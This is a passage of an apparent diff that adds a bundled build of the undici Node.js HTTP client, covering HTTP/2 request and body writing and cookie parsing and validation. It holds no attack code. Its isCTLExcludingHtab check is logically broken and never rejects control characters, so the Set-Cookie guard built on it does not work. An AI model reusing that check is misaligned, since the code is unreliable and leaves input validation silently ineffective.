(client, session, request) { + const { body, method, path, host, upgrade, expectContinue, signal, headers: reqHeaders } = request + + let headers + if (typeof reqHeaders === 'string') headers = Request[kHTTP2CopyHeaders](reqHeaders.trim()) + else headers = reqHeaders + + if (upgrade) { + errorRequest(client, request, new Error('Upgrade not supported for H2')) + return false + } + + try { + // TODO(HTTP/2): Should we call onConnect immediately or on stream ready event? + request.onConnect((err) => { + if (request.aborted || request.completed) { + return + } + + errorRequest(client, request, err || new RequestAbortedError()) + }) + } catch (err) { + errorRequest(client, request, err) + } + + if (request.aborted) { + return false + } + + /** @type {import('node:http2').ClientHttp2Stream} */ + let stream + const h2State = client[kHTTP2SessionState] + + headers[HTTP2_HEADER_AUTHORITY] = host || client[kHost] + headers[HTTP2_HEADER_METHOD] = method + + if (method === 'CONNECT') { + session.ref() + // we are already connected, streams are pending, first request + // will create a new stream. We trigger a request to create the stream and wait until + // `ready` event is triggered + // We disabled endStream to allow the user to write to the stream + stream = session.request(headers, { endStream: false, signal }) + + if (stream.id && !stream.pending) { + request.onUpgrade(null, null, stream) + ++h2State.openStreams + } else { + stream.once('ready', () => { + request.onUpgrade(null, null, stream) + ++h2State.openStreams + }) + } + + stream.once('close', () => { + h2State.openStreams -= 1 + // TODO(HTTP/2): unref only if current streams count is 0 + if (h2State.openStreams === 0) session.unref() + }) + + return true + } + + // https://tools.ietf.org/html/rfc7540#section-8.3 + // :path and :scheme headers must be omited when sending CONNECT + + headers[HTTP2_HEADER_PATH] = path + headers[HTTP2_HEADER_SCHEME] = 'https' + + // https://tools.ietf.org/html/rfc7231#section-4.3.1 + // https://tools.ietf.org/html/rfc7231#section-4.3.2 + // https://tools.ietf.org/html/rfc7231#section-4.3.5 + + // Sending a payload body on a request that does not + // expect it can cause undefined behavior on some + // servers and corrupt connection state. Do not + // re-use the connection for further requests. + + const expectsPayload = ( + method === 'PUT' || + method === 'POST' || + method === 'PATCH' + ) + + if (body && typeof body.read === 'function') { + // Try to read EOF in order to get length. + body.read(0) + } + + let contentLength = util.bodyLength(body) + + if (contentLength == null) { + contentLength = request.contentLength + } + + if (contentLength === 0 || !expectsPayload) { + // https://tools.ietf.org/html/rfc7230#section-3.3.2 + // A user agent SHOULD NOT send a Content-Length header field when + // the request message does not contain a payload body and the method + // semantics do not anticipate such a body. + + contentLength = null + } + + // https://github.com/nodejs/undici/issues/2046 + // A user agent may send a Content-Length header with 0 value, this should be allowed. + if (shouldSendContentLength(method) && contentLength > 0 && request.contentLength != null && request.contentLength !== contentLength) { + if (client[kStrictContentLength]) { + errorRequest(client, request, new RequestContentLengthMismatchError()) + return false + } + + process.emitWarning(new RequestContentLengthMismatchError()) + } + + if (contentLength != null) { + assert(body, 'no body must not have content length') + headers[HTTP2_HEADER_CONTENT_LENGTH] = `${contentLength}` + } + + session.ref() + + const shouldEndStream = method === 'GET' || method === 'HEAD' + if (expectContinue) { + headers[HTTP2_HEADER_EXPECT] = '100-continue' + stream = session.request(headers, { endStream: shouldEndStream, signal }) + + stream.once('continue', writeBodyH2) + } else { + stream = session.request(headers, { + endStream: shouldEndStream, + signal + }) + writeBodyH2() + } + + // Increment counter as we have new several streams open + ++h2State.openStreams + + stream.once('response', headers => { + const { [HTTP2_HEADER_STATUS]: statusCode, ...realHeaders } = headers + + if (request.onHeaders(Number(statusCode), realHeaders, stream.resume.bind(stream), '') === false) { + stream.pause() + } + }) + + stream.once('end', () => { + request.onComplete([]) + }) + + stream.on('data', (chunk) => { + if (request.onData(chunk) === false) { + stream.pause() + } + }) + + stream.once('close', () => { + h2State.openStreams -= 1 + // TODO(HTTP/2): unref only if current streams count is 0 + if (h2State.openStreams === 0) { + session.unref() + } + }) + + stream.once('error', function (err) { + if (client[kHTTP2Session] && !client[kHTTP2Session].destroyed && !this.closed && !this.destroyed) { + h2State.streams -= 1 + util.destroy(stream, err) + } + }) + + stream.once('frameError', (type, code) => { + const err = new InformationalError(`HTTP/2: "frameError" received - type ${type}, code ${code}`) + errorRequest(client, request, err) + + if (client[kHTTP2Session] && !client[kHTTP2Session].destroyed && !this.closed && !this.destroyed) { + h2State.streams -= 1 + util.destroy(stream, err) + } + }) + + // stream.on('aborted', () => { + // // TODO(HTTP/2): Support aborted + // }) + + // stream.on('timeout', () => { + // // TODO(HTTP/2): Support timeout + // }) + + // stream.on('push', headers => { + // // TODO(HTTP/2): Suppor push + // }) + + // stream.on('trailers', headers => { + // // TODO(HTTP/2): Support trailers + // }) + + return true + + function writeBodyH2 () { + /* istanbul ignore else: assertion */ + if (!body) { + request.onRequestSent() + } else if (util.isBuffer(body)) { + assert(contentLength === body.byteLength, 'buffer body must have content length') + stream.cork() + stream.write(body) + stream.uncork() + stream.end() + request.onBodySent(body) + request.onRequestSent() + } else if (util.isBlobLike(body)) { + if (typeof body.stream === 'function') { + writeIterable({ + client, + request, + contentLength, + h2stream: stream, + expectsPayload, + body: body.stream(), + socket: client[kSocket], + header: '' + }) + } else { + writeBlob({ + body, + client, + request, + contentLength, + expectsPayload, + h2stream: stream, + header: '', + socket: client[kSocket] + }) + } + } else if (util.isStream(body)) { + writeStream({ + body, + client, + request, + contentLength, + expectsPayload, + socket: client[kSocket], + h2stream: stream, + header: '' + }) + } else if (util.isIterable(body)) { + writeIterable({ + body, + client, + request, + contentLength, + expectsPayload, + header: '', + h2stream: stream, + socket: client[kSocket] + }) + } else { + assert(false) + } + } +} + +function writeStream ({ h2stream, body, client, request, socket, contentLength, header, expectsPayload }) { + assert(contentLength !== 0 || client[kRunning] === 0, 'stream body cannot be pipelined') + + if (client[kHTTPConnVersion] === 'h2') { + // For HTTP/2, is enough to pipe the stream + const pipe = pipeline( + body, + h2stream, + (err) => { + if (err) { + util.destroy(body, err) + util.destroy(h2stream, err) + } else { + request.onRequestSent() + } + } + ) + + pipe.on('data', onPipeData) + pipe.once('end', () => { + pipe.removeListener('data', onPipeData) + util.destroy(pipe) + }) + + function onPipeData (chunk) { + request.onBodySent(chunk) + } + + return + } + + let finished = false + + const writer = new AsyncWriter({ socket, request, contentLength, client, expectsPayload, header }) + + const onData = function (chunk) { + if (finished) { + return + } + + try { + if (!writer.write(chunk) && this.pause) { + this.pause() + } + } catch (err) { + util.destroy(this, err) + } + } + const onDrain = function () { + if (finished) { + return + } + + if (body.resume) { + body.resume() + } + } + const onAbort = function () { + if (finished) { + return + } + const err = new RequestAbortedError() + queueMicrotask(() => onFinished(err)) + } + const onFinished = function (err) { + if (finished) { + return + } + + finished = true + + assert(socket.destroyed || (socket[kWriting] && client[kRunning] <= 1)) + + socket + .off('drain', onDrain) + .off('error', onFinished) + + body + .removeListener('data', onData) + .removeListener('end', onFinished) + .removeListener('error', onFinished) + .removeListener('close', onAbort) + + if (!err) { + try { + writer.end() + } catch (er) { + err = er + } + } + + writer.destroy(err) + + if (err && (err.code !== 'UND_ERR_INFO' || err.message !== 'reset')) { + util.destroy(body, err) + } else { + util.destroy(body) + } + } + + body + .on('data', onData) + .on('end', onFinished) + .on('error', onFinished) + .on('close', onAbort) + + if (body.resume) { + body.resume() + } + + socket + .on('drain', onDrain) + .on('error', onFinished) +} + +async function writeBlob ({ h2stream, body, client, request, socket, contentLength, header, expectsPayload }) { + assert(contentLength === body.size, 'blob body must have content length') + + const isH2 = client[kHTTPConnVersion] === 'h2' + try { + if (contentLength != null && contentLength !== body.size) { + throw new RequestContentLengthMismatchError() + } + + const buffer = Buffer.from(await body.arrayBuffer()) + + if (isH2) { + h2stream.cork() + h2stream.write(buffer) + h2stream.uncork() + } else { + socket.cork() + socket.write(`${header}content-length: ${contentLength}\r\n\r\n`, 'latin1') + socket.write(buffer) + socket.uncork() + } + + request.onBodySent(buffer) + request.onRequestSent() + + if (!expectsPayload) { + socket[kReset] = true + } + + resume(client) + } catch (err) { + util.destroy(isH2 ? h2stream : socket, err) + } +} + +async function writeIterable ({ h2stream, body, client, request, socket, contentLength, header, expectsPayload }) { + assert(contentLength !== 0 || client[kRunning] === 0, 'iterator body cannot be pipelined') + + let callback = null + function onDrain () { + if (callback) { + const cb = callback + callback = null + cb() + } + } + + const waitForDrain = () => new Promise((resolve, reject) => { + assert(callback === null) + + if (socket[kError]) { + reject(socket[kError]) + } else { + callback = resolve + } + }) + + if (client[kHTTPConnVersion] === 'h2') { + h2stream + .on('close', onDrain) + .on('drain', onDrain) + + try { + // It's up to the user to somehow abort the async iterable. + for await (const chunk of body) { + if (socket[kError]) { + throw socket[kError] + } + + const res = h2stream.write(chunk) + request.onBodySent(chunk) + if (!res) { + await waitForDrain() + } + } + } catch (err) { + h2stream.destroy(err) + } finally { + request.onRequestSent() + h2stream.end() + h2stream + .off('close', onDrain) + .off('drain', onDrain) + } + + return + } + + socket + .on('close', onDrain) + .on('drain', onDrain) + + const writer = new AsyncWriter({ socket, request, contentLength, client, expectsPayload, header }) + try { + // It's up to the user to somehow abort the async iterable. + for await (const chunk of body) { + if (socket[kError]) { + throw socket[kError] + } + + if (!writer.write(chunk)) { + await waitForDrain() + } + } + + writer.end() + } catch (err) { + writer.destroy(err) + } finally { + socket + .off('close', onDrain) + .off('drain', onDrain) + } +} + +class AsyncWriter { + constructor ({ socket, request, contentLength, client, expectsPayload, header }) { + this.socket = socket + this.request = request + this.contentLength = contentLength + this.client = client + this.bytesWritten = 0 + this.expectsPayload = expectsPayload + this.header = header + + socket[kWriting] = true + } + + write (chunk) { + const { socket, request, contentLength, client, bytesWritten, expectsPayload, header } = this + + if (socket[kError]) { + throw socket[kError] + } + + if (socket.destroyed) { + return false + } + + const len = Buffer.byteLength(chunk) + if (!len) { + return true + } + + // We should defer writing chunks. + if (contentLength !== null && bytesWritten + len > contentLength) { + if (client[kStrictContentLength]) { + throw new RequestContentLengthMismatchError() + } + + process.emitWarning(new RequestContentLengthMismatchError()) + } + + socket.cork() + + if (bytesWritten === 0) { + if (!expectsPayload) { + socket[kReset] = true + } + + if (contentLength === null) { + socket.write(`${header}transfer-encoding: chunked\r\n`, 'latin1') + } else { + socket.write(`${header}content-length: ${contentLength}\r\n\r\n`, 'latin1') + } + } + + if (contentLength === null) { + socket.write(`\r\n${len.toString(16)}\r\n`, 'latin1') + } + + this.bytesWritten += len + + const ret = socket.write(chunk) + + socket.uncork() + + request.onBodySent(chunk) + + if (!ret) { + if (socket[kParser].timeout && socket[kParser].timeoutType === TIMEOUT_HEADERS) { + // istanbul ignore else: only for jest + if (socket[kParser].timeout.refresh) { + socket[kParser].timeout.refresh() + } + } + } + + return ret + } + + end () { + const { socket, contentLength, client, bytesWritten, expectsPayload, header, request } = this + request.onRequestSent() + + socket[kWriting] = false + + if (socket[kError]) { + throw socket[kError] + } + + if (socket.destroyed) { + return + } + + if (bytesWritten === 0) { + if (expectsPayload) { + // https://tools.ietf.org/html/rfc7230#section-3.3.2 + // A user agent SHOULD send a Content-Length in a request message when + // no Transfer-Encoding is sent and the request method defines a meaning + // for an enclosed payload body. + + socket.write(`${header}content-length: 0\r\n\r\n`, 'latin1') + } else { + socket.write(`${header}\r\n`, 'latin1') + } + } else if (contentLength === null) { + socket.write('\r\n0\r\n\r\n', 'latin1') + } + + if (contentLength !== null && bytesWritten !== contentLength) { + if (client[kStrictContentLength]) { + throw new RequestContentLengthMismatchError() + } else { + process.emitWarning(new RequestContentLengthMismatchError()) + } + } + + if (socket[kParser].timeout && socket[kParser].timeoutType === TIMEOUT_HEADERS) { + // istanbul ignore else: only for jest + if (socket[kParser].timeout.refresh) { + socket[kParser].timeout.refresh() + } + } + + resume(client) + } + + destroy (err) { + const { socket, client } = this + + socket[kWriting] = false + + if (err) { + assert(client[kRunning] <= 1, 'pipeline should only contain this request') + util.destroy(socket, err) + } + } +} + +function errorRequest (client, request, err) { + try { + request.onError(err) + assert(request.aborted) + } catch (err) { + client.emit('error', err) + } +} + +module.exports = Client + + +/***/ }), + +/***/ 6436: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +/* istanbul ignore file: only for Node 12 */ + +const { kConnected, kSize } = __nccwpck_require__(2785) + +class CompatWeakRef { + constructor (value) { + this.value = value + } + + deref () { + return this.value[kConnected] === 0 && this.value[kSize] === 0 + ? undefined + : this.value + } +} + +class CompatFinalizer { + constructor (finalizer) { + this.finalizer = finalizer + } + + register (dispatcher, key) { + if (dispatcher.on) { + dispatcher.on('disconnect', () => { + if (dispatcher[kConnected] === 0 && dispatcher[kSize] === 0) { + this.finalizer(key) + } + }) + } + } +} + +module.exports = function () { + // FIXME: remove workaround when the Node bug is fixed + // https://github.com/nodejs/node/issues/49344#issuecomment-1741776308 + if (process.env.NODE_V8_COVERAGE) { + return { + WeakRef: CompatWeakRef, + FinalizationRegistry: CompatFinalizer + } + } + return { + WeakRef: global.WeakRef || CompatWeakRef, + FinalizationRegistry: global.FinalizationRegistry || CompatFinalizer + } +} + + +/***/ }), + +/***/ 663: +/***/ ((module) => { + +"use strict"; + + +// https://wicg.github.io/cookie-store/#cookie-maximum-attribute-value-size +const maxAttributeValueSize = 1024 + +// https://wicg.github.io/cookie-store/#cookie-maximum-name-value-pair-size +const maxNameValuePairSize = 4096 + +module.exports = { + maxAttributeValueSize, + maxNameValuePairSize +} + + +/***/ }), + +/***/ 1724: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { parseSetCookie } = __nccwpck_require__(4408) +const { stringify, getHeadersList } = __nccwpck_require__(3121) +const { webidl } = __nccwpck_require__(1744) +const { Headers } = __nccwpck_require__(554) + +/** + * @typedef {Object} Cookie + * @property {string} name + * @property {string} value + * @property {Date|number|undefined} expires + * @property {number|undefined} maxAge + * @property {string|undefined} domain + * @property {string|undefined} path + * @property {boolean|undefined} secure + * @property {boolean|undefined} httpOnly + * @property {'Strict'|'Lax'|'None'} sameSite + * @property {string[]} unparsed + */ + +/** + * @param {Headers} headers + * @returns {Record} + */ +function getCookies (headers) { + webidl.argumentLengthCheck(arguments, 1, { header: 'getCookies' }) + + webidl.brandCheck(headers, Headers, { strict: false }) + + const cookie = headers.get('cookie') + const out = {} + + if (!cookie) { + return out + } + + for (const piece of cookie.split(';')) { + const [name, ...value] = piece.split('=') + + out[name.trim()] = value.join('=') + } + + return out +} + +/** + * @param {Headers} headers + * @param {string} name + * @param {{ path?: string, domain?: string }|undefined} attributes + * @returns {void} + */ +function deleteCookie (headers, name, attributes) { + webidl.argumentLengthCheck(arguments, 2, { header: 'deleteCookie' }) + + webidl.brandCheck(headers, Headers, { strict: false }) + + name = webidl.converters.DOMString(name) + attributes = webidl.converters.DeleteCookieAttributes(attributes) + + // Matches behavior of + // https://github.com/denoland/deno_std/blob/63827b16330b82489a04614027c33b7904e08be5/http/cookie.ts#L278 + setCookie(headers, { + name, + value: '', + expires: new Date(0), + ...attributes + }) +} + +/** + * @param {Headers} headers + * @returns {Cookie[]} + */ +function getSetCookies (headers) { + webidl.argumentLengthCheck(arguments, 1, { header: 'getSetCookies' }) + + webidl.brandCheck(headers, Headers, { strict: false }) + + const cookies = getHeadersList(headers).cookies + + if (!cookies) { + return [] + } + + // In older versions of undici, cookies is a list of name:value. + return cookies.map((pair) => parseSetCookie(Array.isArray(pair) ? pair[1] : pair)) +} + +/** + * @param {Headers} headers + * @param {Cookie} cookie + * @returns {void} + */ +function setCookie (headers, cookie) { + webidl.argumentLengthCheck(arguments, 2, { header: 'setCookie' }) + + webidl.brandCheck(headers, Headers, { strict: false }) + + cookie = webidl.converters.Cookie(cookie) + + const str = stringify(cookie) + + if (str) { + headers.append('Set-Cookie', stringify(cookie)) + } +} + +webidl.converters.DeleteCookieAttributes = webidl.dictionaryConverter([ + { + converter: webidl.nullableConverter(webidl.converters.DOMString), + key: 'path', + defaultValue: null + }, + { + converter: webidl.nullableConverter(webidl.converters.DOMString), + key: 'domain', + defaultValue: null + } +]) + +webidl.converters.Cookie = webidl.dictionaryConverter([ + { + converter: webidl.converters.DOMString, + key: 'name' + }, + { + converter: webidl.converters.DOMString, + key: 'value' + }, + { + converter: webidl.nullableConverter((value) => { + if (typeof value === 'number') { + return webidl.converters['unsigned long long'](value) + } + + return new Date(value) + }), + key: 'expires', + defaultValue: null + }, + { + converter: webidl.nullableConverter(webidl.converters['long long']), + key: 'maxAge', + defaultValue: null + }, + { + converter: webidl.nullableConverter(webidl.converters.DOMString), + key: 'domain', + defaultValue: null + }, + { + converter: webidl.nullableConverter(webidl.converters.DOMString), + key: 'path', + defaultValue: null + }, + { + converter: webidl.nullableConverter(webidl.converters.boolean), + key: 'secure', + defaultValue: null + }, + { + converter: webidl.nullableConverter(webidl.converters.boolean), + key: 'httpOnly', + defaultValue: null + }, + { + converter: webidl.converters.USVString, + key: 'sameSite', + allowedValues: ['Strict', 'Lax', 'None'] + }, + { + converter: webidl.sequenceConverter(webidl.converters.DOMString), + key: 'unparsed', + defaultValue: [] + } +]) + +module.exports = { + getCookies, + deleteCookie, + getSetCookies, + setCookie +} + + +/***/ }), + +/***/ 4408: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { maxNameValuePairSize, maxAttributeValueSize } = __nccwpck_require__(663) +const { isCTLExcludingHtab } = __nccwpck_require__(3121) +const { collectASequenceOfCodePointsFast } = __nccwpck_require__(685) +const assert = __nccwpck_require__(9491) + +/** + * @description Parses the field-value attributes of a set-cookie header string. + * @see https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4 + * @param {string} header + * @returns if the header is invalid, null will be returned + */ +function parseSetCookie (header) { + // 1. If the set-cookie-string contains a %x00-08 / %x0A-1F / %x7F + // character (CTL characters excluding HTAB): Abort these steps and + // ignore the set-cookie-string entirely. + if (isCTLExcludingHtab(header)) { + return null + } + + let nameValuePair = '' + let unparsedAttributes = '' + let name = '' + let value = '' + + // 2. If the set-cookie-string contains a %x3B (";") character: + if (header.includes(';')) { + // 1. The name-value-pair string consists of the characters up to, + // but not including, the first %x3B (";"), and the unparsed- + // attributes consist of the remainder of the set-cookie-string + // (including the %x3B (";") in question). + const position = { position: 0 } + + nameValuePair = collectASequenceOfCodePointsFast(';', header, position) + unparsedAttributes = header.slice(position.position) + } else { + // Otherwise: + + // 1. The name-value-pair string consists of all the characters + // contained in the set-cookie-string, and the unparsed- + // attributes is the empty string. + nameValuePair = header + } + + // 3. If the name-value-pair string lacks a %x3D ("=") character, then + // the name string is empty, and the value string is the value of + // name-value-pair. + if (!nameValuePair.includes('=')) { + value = nameValuePair + } else { + // Otherwise, the name string consists of the characters up to, but + // not including, the first %x3D ("=") character, and the (possibly + // empty) value string consists of the characters after the first + // %x3D ("=") character. + const position = { position: 0 } + name = collectASequenceOfCodePointsFast( + '=', + nameValuePair, + position + ) + value = nameValuePair.slice(position.position + 1) + } + + // 4. Remove any leading or trailing WSP characters from the name + // string and the value string. + name = name.trim() + value = value.trim() + + // 5. If the sum of the lengths of the name string and the value string + // is more than 4096 octets, abort these steps and ignore the set- + // cookie-string entirely. + if (name.length + value.length > maxNameValuePairSize) { + return null + } + + // 6. The cookie-name is the name string, and the cookie-value is the + // value string. + return { + name, value, ...parseUnparsedAttributes(unparsedAttributes) + } +} + +/** + * Parses the remaining attributes of a set-cookie header + * @see https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4 + * @param {string} unparsedAttributes + * @param {[Object.]={}} cookieAttributeList + */ +function parseUnparsedAttributes (unparsedAttributes, cookieAttributeList = {}) { + // 1. If the unparsed-attributes string is empty, skip the rest of + // these steps. + if (unparsedAttributes.length === 0) { + return cookieAttributeList + } + + // 2. Discard the first character of the unparsed-attributes (which + // will be a %x3B (";") character). + assert(unparsedAttributes[0] === ';') + unparsedAttributes = unparsedAttributes.slice(1) + + let cookieAv = '' + + // 3. If the remaining unparsed-attributes contains a %x3B (";") + // character: + if (unparsedAttributes.includes(';')) { + // 1. Consume the characters of the unparsed-attributes up to, but + // not including, the first %x3B (";") character. + cookieAv = collectASequenceOfCodePointsFast( + ';', + unparsedAttributes, + { position: 0 } + ) + unparsedAttributes = unparsedAttributes.slice(cookieAv.length) + } else { + // Otherwise: + + // 1. Consume the remainder of the unparsed-attributes. + cookieAv = unparsedAttributes + unparsedAttributes = '' + } + + // Let the cookie-av string be the characters consumed in this step. + + let attributeName = '' + let attributeValue = '' + + // 4. If the cookie-av string contains a %x3D ("=") character: + if (cookieAv.includes('=')) { + // 1. The (possibly empty) attribute-name string consists of the + // characters up to, but not including, the first %x3D ("=") + // character, and the (possibly empty) attribute-value string + // consists of the characters after the first %x3D ("=") + // character. + const position = { position: 0 } + + attributeName = collectASequenceOfCodePointsFast( + '=', + cookieAv, + position + ) + attributeValue = cookieAv.slice(position.position + 1) + } else { + // Otherwise: + + // 1. The attribute-name string consists of the entire cookie-av + // string, and the attribute-value string is empty. + attributeName = cookieAv + } + + // 5. Remove any leading or trailing WSP characters from the attribute- + // name string and the attribute-value string. + attributeName = attributeName.trim() + attributeValue = attributeValue.trim() + + // 6. If the attribute-value is longer than 1024 octets, ignore the + // cookie-av string and return to Step 1 of this algorithm. + if (attributeValue.length > maxAttributeValueSize) { + return parseUnparsedAttributes(unparsedAttributes, cookieAttributeList) + } + + // 7. Process the attribute-name and attribute-value according to the + // requirements in the following subsections. (Notice that + // attributes with unrecognized attribute-names are ignored.) + const attributeNameLowercase = attributeName.toLowerCase() + + // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4.1 + // If the attribute-name case-insensitively matches the string + // "Expires", the user agent MUST process the cookie-av as follows. + if (attributeNameLowercase === 'expires') { + // 1. Let the expiry-time be the result of parsing the attribute-value + // as cookie-date (see Section 5.1.1). + const expiryTime = new Date(attributeValue) + + // 2. If the attribute-value failed to parse as a cookie date, ignore + // the cookie-av. + + cookieAttributeList.expires = expiryTime + } else if (attributeNameLowercase === 'max-age') { + // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4.2 + // If the attribute-name case-insensitively matches the string "Max- + // Age", the user agent MUST process the cookie-av as follows. + + // 1. If the first character of the attribute-value is not a DIGIT or a + // "-" character, ignore the cookie-av. + const charCode = attributeValue.charCodeAt(0) + + if ((charCode < 48 || charCode > 57) && attributeValue[0] !== '-') { + return parseUnparsedAttributes(unparsedAttributes, cookieAttributeList) + } + + // 2. If the remainder of attribute-value contains a non-DIGIT + // character, ignore the cookie-av. + if (!/^\d+$/.test(attributeValue)) { + return parseUnparsedAttributes(unparsedAttributes, cookieAttributeList) + } + + // 3. Let delta-seconds be the attribute-value converted to an integer. + const deltaSeconds = Number(attributeValue) + + // 4. Let cookie-age-limit be the maximum age of the cookie (which + // SHOULD be 400 days or less, see Section 4.1.2.2). + + // 5. Set delta-seconds to the smaller of its present value and cookie- + // age-limit. + // deltaSeconds = Math.min(deltaSeconds * 1000, maxExpiresMs) + + // 6. If delta-seconds is less than or equal to zero (0), let expiry- + // time be the earliest representable date and time. Otherwise, let + // the expiry-time be the current date and time plus delta-seconds + // seconds. + // const expiryTime = deltaSeconds <= 0 ? Date.now() : Date.now() + deltaSeconds + + // 7. Append an attribute to the cookie-attribute-list with an + // attribute-name of Max-Age and an attribute-value of expiry-time. + cookieAttributeList.maxAge = deltaSeconds + } else if (attributeNameLowercase === 'domain') { + // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4.3 + // If the attribute-name case-insensitively matches the string "Domain", + // the user agent MUST process the cookie-av as follows. + + // 1. Let cookie-domain be the attribute-value. + let cookieDomain = attributeValue + + // 2. If cookie-domain starts with %x2E ("."), let cookie-domain be + // cookie-domain without its leading %x2E ("."). + if (cookieDomain[0] === '.') { + cookieDomain = cookieDomain.slice(1) + } + + // 3. Convert the cookie-domain to lower case. + cookieDomain = cookieDomain.toLowerCase() + + // 4. Append an attribute to the cookie-attribute-list with an + // attribute-name of Domain and an attribute-value of cookie-domain. + cookieAttributeList.domain = cookieDomain + } else if (attributeNameLowercase === 'path') { + // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4.4 + // If the attribute-name case-insensitively matches the string "Path", + // the user agent MUST process the cookie-av as follows. + + // 1. If the attribute-value is empty or if the first character of the + // attribute-value is not %x2F ("/"): + let cookiePath = '' + if (attributeValue.length === 0 || attributeValue[0] !== '/') { + // 1. Let cookie-path be the default-path. + cookiePath = '/' + } else { + // Otherwise: + + // 1. Let cookie-path be the attribute-value. + cookiePath = attributeValue + } + + // 2. Append an attribute to the cookie-attribute-list with an + // attribute-name of Path and an attribute-value of cookie-path. + cookieAttributeList.path = cookiePath + } else if (attributeNameLowercase === 'secure') { + // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4.5 + // If the attribute-name case-insensitively matches the string "Secure", + // the user agent MUST append an attribute to the cookie-attribute-list + // with an attribute-name of Secure and an empty attribute-value. + + cookieAttributeList.secure = true + } else if (attributeNameLowercase === 'httponly') { + // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4.6 + // If the attribute-name case-insensitively matches the string + // "HttpOnly", the user agent MUST append an attribute to the cookie- + // attribute-list with an attribute-name of HttpOnly and an empty + // attribute-value. + + cookieAttributeList.httpOnly = true + } else if (attributeNameLowercase === 'samesite') { + // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4.7 + // If the attribute-name case-insensitively matches the string + // "SameSite", the user agent MUST process the cookie-av as follows: + + // 1. Let enforcement be "Default". + let enforcement = 'Default' + + const attributeValueLowercase = attributeValue.toLowerCase() + // 2. If cookie-av's attribute-value is a case-insensitive match for + // "None", set enforcement to "None". + if (attributeValueLowercase.includes('none')) { + enforcement = 'None' + } + + // 3. If cookie-av's attribute-value is a case-insensitive match for + // "Strict", set enforcement to "Strict". + if (attributeValueLowercase.includes('strict')) { + enforcement = 'Strict' + } + + // 4. If cookie-av's attribute-value is a case-insensitive match for + // "Lax", set enforcement to "Lax". + if (attributeValueLowercase.includes('lax')) { + enforcement = 'Lax' + } + + // 5. Append an attribute to the cookie-attribute-list with an + // attribute-name of "SameSite" and an attribute-value of + // enforcement. + cookieAttributeList.sameSite = enforcement + } else { + cookieAttributeList.unparsed ??= [] + + cookieAttributeList.unparsed.push(`${attributeName}=${attributeValue}`) + } + + // 8. Return to Step 1 of this algorithm. + return parseUnparsedAttributes(unparsedAttributes, cookieAttributeList) +} + +module.exports = { + parseSetCookie, + parseUnparsedAttributes +} + + +/***/ }), + +/***/ 3121: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const assert = __nccwpck_require__(9491) +const { kHeadersList } = __nccwpck_require__(2785) + +function isCTLExcludingHtab (value) { + if (value.length === 0) { + return false + } + + for (const char of value) { + const code = char.charCodeAt(0) + + if ( + (code >= 0x00 || code <= 0x08) || + (code >= 0x0A || code <= 0x1F) || + code === 0x7F + ) { + return false + } + } +} + +/** + CHAR = + token = 1* + separators = "(" | ")" | "<" | ">" | "@" + | "," | ";" | ":" | "\" | <"> + | "/" | "[" | "]" | "?" | "=" + | "{" | "}" | SP | HT + * @param {string} name + */ +function validateCookieName (name) { + for (const char of name) { + const code = char.charCodeAt(0) + + if ( + (code <= 0x20 || code > 0x7F) || + char === '(' || + char === ')' || + char === '>' || + char === '<' || + char === '@' || + char === ',' || + char === ';' || + char === ':' || + char === '\\' || + char === '"' || + char === '/' || + char === '[' || + char === ']' || + char === '?' || + char === '=' || + char === '{' || + char === '}' + ) { + throw new Error('Invalid cookie name') + } + } +} + +/** + cookie-value = *cookie-octet / ( DQUOTE *cookie-octet DQUOTE ) + cookie-octet = %x21 / %x23-2B / %x2D-3A / %x3C-5B / %x5D-7E + ; US-ASCII characters excluding CTLs, + ; whitespace DQUOTE, comma, semicolon, + ; and backslash + * @param {string} value + */ +function validateCookieValue (value) { + for (const char of value) { + const code = char.charCodeAt(0) + + if ( + code < 0x21 || // exclude CTLs (0-31) + code === 0x22 || + code === 0x2C || + code === 0x3B || + code === 0x5C || + code > 0x7E // non-ascii + ) { + throw new Error('Invalid header value') + } + } +} + +/** + * path-value = + * @param {string} path + */ +function validateCookiePath (path) { + for (const char of path) { + const code = char.charCodeAt(0) + + if (code < 0x21 || char === ';') { + throw new Error('Invalid cookie path') + } + } +} + +/** + * I have no idea why these values aren't allowed to be honest, + * but Deno tests these. - Khafra + * @param {string} domain + */ +function validateCookieDomain (domain) { + if ( + domain.startsWith('-') || + domain.endsWith('.') || + domain.endsWith('-') + ) { + throw new Error('Invalid cookie domain') + } +} + +/** + * @see https://www.rfc-editor.org/rfc/rfc7231#section-7.1.1.1 + * @param {number|Date} date + IMF-fixdate = day-name "," SP date1 SP time-of-day SP GMT + ; fixed length/zone/capitalization subset of the format + ; see Section 3.3 of [RFC5322] + + day-name = %x4D.6F.6E ; "Mon", case-sensitive + / %x54.75.65 ; "Tue", case-sensitive + / %x57.65.64 ; "Wed", case-sensitive + / %x54.68.75 ; "Thu", case-sensitive + / %x46.72.69 ; "Fri", case-sensitive + / %x53.61.74 ; "Sat", case-sensitive + / %x53.75.6E ; "Sun", case-sensitive + date1 = day SP month SP year + ; e.g., 02 Jun 1982 + + day = 2DIGIT + month = %x4A.61.6E ; "Jan", case-sensitive + / %x46.65.62 ; "Feb", case-sensitive + / %x4D.61.72 ; "Mar", case-sensitive + / %x41.70.72 ; "Apr", case-sensitive + / %x4D.61.79 ; "May", case-sensitive + / %x4A.75.6E ; "Jun", case-sensitive + / %x4A.75.6C ; "Jul", case-sensitive + / %x41.75.67 ; "Aug", case-sensitive + / %x53.65.70 ; "Sep", case-sensitive + / %x4F.63.74 ; "Oct", case-sensitive + / %x4E.6F.76 ; "Nov", case-sensitive + / %x44.65.63 ; "Dec", case-sensitive + year = 